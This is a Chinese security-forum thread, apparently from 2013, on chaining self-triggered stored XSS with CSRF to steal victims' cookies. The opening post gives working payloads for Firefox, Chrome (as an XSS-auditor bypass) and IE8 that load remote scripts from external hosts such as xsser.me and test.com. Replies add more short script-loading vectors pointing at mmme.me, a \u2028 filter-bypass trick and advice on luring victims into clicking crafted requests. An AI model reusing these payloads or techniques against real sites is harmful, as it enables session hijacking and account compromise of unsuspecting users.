很多时候我们会碰到一些xss,自己编辑的时候没有过滤,但保存以后过滤了,点击编辑又会触发,这个时候会感觉很鸡肋对不对。
这个时候就会想能不能csrf去触发修改,这样受害者不是能够自己x自己了,我们也能收到想要了cookies了,基于这个想法只要找一些鸡肋的xss和没有做csrf的地方
1.firefox下基本没有任何对csrf+xss的防御,用户只要点击你的网址直接用
"><script src=http://xsser.me/*****></script>
就可以了
2.chrome下就要用到一个chrome的0day,sogili大牛提供的
"><svg><script xlink:href=//********></script> chrome的bypass
3.ie8,对于ie8来说过滤器还是满强大的,但二哥之前发过一个0day
IE8 xss filter bypass (xss过滤器绕过)
再结合群里童鞋提供的
onerror="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"
这个方法来触发接收cookies就可以了
以上三个案例都已经能够尝试能够成功获取到cookies,正好把那些鸡肋的cookies和无危害的csrf利用起来
上面的方法对反射型的xss应该也都是有作用的,不过缺点在于不能通杀,不知道大牛们能不能搞出通杀的
1#
z7y (亲爱滴~VIP) | 2013-01-03 23:22
@小胖胖要减肥 啊哈,此贴可以顶!
2#
YangCL | 2013-01-03 23:29
前排留名~~ 学习咯~
3#
蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-01-03 23:30
可以顶
4#
Sogili (. )( .) | 2013-01-03 23:42
不错唉..
5#
/fd (/proc) ?() | 2013-01-04 00:07
第三點該不是參考我的吧
#7
加個+new Date()可防止cache,比Math.random()短一些
6#
/fd (/proc) ?() | 2013-01-04 00:10
額,我是指那句動態插入js的代碼不是第三點
7#
小胖胖要减肥 | 2013-01-04 00:11
@/fd 反正大家都是一个论坛的,资源共享嘛
8#
Sogili (. )( .) | 2013-01-04 00:14
@/fd - =很常见的...
顺便分享几条群里讨论时发的短html加载外部script的vec:
<iframe src='javascript:<script/src=//mmme.me></script>'>
<svg/onload=appendChild(createElement('script')).src='//mmme.me'>
<svg/onload=write('<script/src=//mmme.me></script>')>
9#
/fd (/proc) ?() | 2013-01-04 00:15
說起來較早的Chrome版本可以透過line separator(\u2028) bypass auditor,而\u2028在地址欄又可以隱藏其後的query string…(釣魚?)
10#
/fd (/proc) ?() | 2013-01-04 00:16
@Sogili 我也知道很常見,只是script的地址太巧合
11#
Sogili (. )( .) | 2013-01-04 00:17
@/fd 这个bug在xss.js的最新版本中有使用 :D
12#
Sogili (. )( .) | 2013-01-04 00:19
@/fd \u2028或许可以打破很多网站的js string.
13#
/fd (/proc) ?() | 2013-01-04 00:22
@Sogili 還有\u2029呢,看來ECMAScript及HTML5文檔的各種細節是知得愈多愈好
14#
小胖胖要减肥 | 2013-01-04 10:37
@/fd onload的那个怎么写的,还有其他的么,都贡献出来呀
15#
se55i0n (那些年,我们一起看的岛国动作片~) | 2013-01-04 10:39
@Sogili @/fd 大牛们多多总结呀~
16#
小胖胖要减肥 | 2013-01-04 10:44
@se55i0n 什么时候大牛来个简单的rootkit案例可以让我们这些小菜学习学习,慢慢进阶啊,直接gmail那个太高端了
17#
se55i0n (那些年,我们一起看的岛国动作片~) | 2013-01-04 10:48
@小胖胖要减肥 人家那是换美刀的洞洞,我们只有慢慢打小怪兽升级咯~
18#
xfkxfk | 2013-01-04 11:06
@小胖胖要减肥 对于这个自己x自己得存储型xss,经常遇到,你说的编辑触发,保存过滤的也遇到了。想到过csrf,但是不知道具体怎么实现让受害者能自己x自己。首先受害者编辑的内容得是xss code,而后他要进行编辑操作,这个过程怎么实现啊?请大哥赐教。。。感谢先
19#
小胖胖要减肥 | 2013-01-04 11:16
@xfkxfk 比如个人信息,你自己构造一个页面放别人的网站或自己的网站,也可以只是一个post的url,具体看场景,关键是诱使别人点击,比如发帖,说有好东西来看啊,点击后触发post请求,修改个人信息并提交保存,xss code就是某个字段,csrf的wooyun例子很多,具体场景看具体怎么利用吧
20#
xfkxfk | 2013-01-04 11:26
@小胖胖要减肥 嗯,原理明白了,下来的慢慢实践,感谢!
21#
txcbg | 2013-01-04 17:17
学习下
22#
erevus | 2013-01-04 20:52
求IE10的
23#
小胖胖要减肥 | 2013-01-04 23:39
现在短链用不了了,发射型的比如g牛这个WooYun: 腾讯微博一处两用DOM-XSS,能反射,能后门,用csrf来搞直接dom,还能自动跳转到那个搜索页触发xss,这个例子很好啊,就是修复了